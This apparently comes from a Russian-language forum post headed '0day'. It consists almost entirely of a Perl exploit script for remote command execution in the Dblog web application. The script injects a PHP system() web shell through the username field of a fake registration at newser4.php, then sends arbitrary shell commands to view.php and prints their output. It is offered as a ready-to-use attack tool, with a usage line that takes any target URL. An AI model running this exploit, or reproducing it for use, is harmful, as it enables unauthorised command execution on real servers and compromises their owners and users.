0day - Dblog Remote Command Execution
Эксплоит:
Эксплоит:
Код:
#!/usr/bin/perl
use LWP::UserAgent;
if ( !$ARGV[1] )
{ print "Usage: dblog.pl http://site.com/dblog_path command \n";
print " dblog.pl http://127.0.0.1/dblog ls\n";
exit;
}
print q{
###################################################\n
# Dblog Remote Command Execution Exploit #\n
# discovered and coded by KingOfSka #\n
# https://contropotere.netsons.org #\n
###################################################\n
};
my $path = $ARGV[0]; #
my $cmd = $ARGV[1];
print "[*] Trying to exploit $path ...\n";
my $ua = new LWP::UserAgent;
$ua->agent("Dblog Exploiter" . $ua->agent);
print "[*] Registering fake user ...\n";
my $req = new HTTP::Request POST => $path . "/newser4.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content('user=<?php echo 777; system($_POST[cmd]); echo 888; ?>');
my $res = $ua->request($req);
#print $res->content;
print "[*] Sending Command ...\n";
my $req2 = new HTTP::Request POST => $path . "/view.php";
$req2->content_type('application/x-www-form-urlencoded');
$req2->content("cmd=".$cmd);
my $res2 = $ua->request($req2);
$res2->content =~/777(.*)888/s;
print "[*] Output from \"$cmd\" ...\n";
print $1;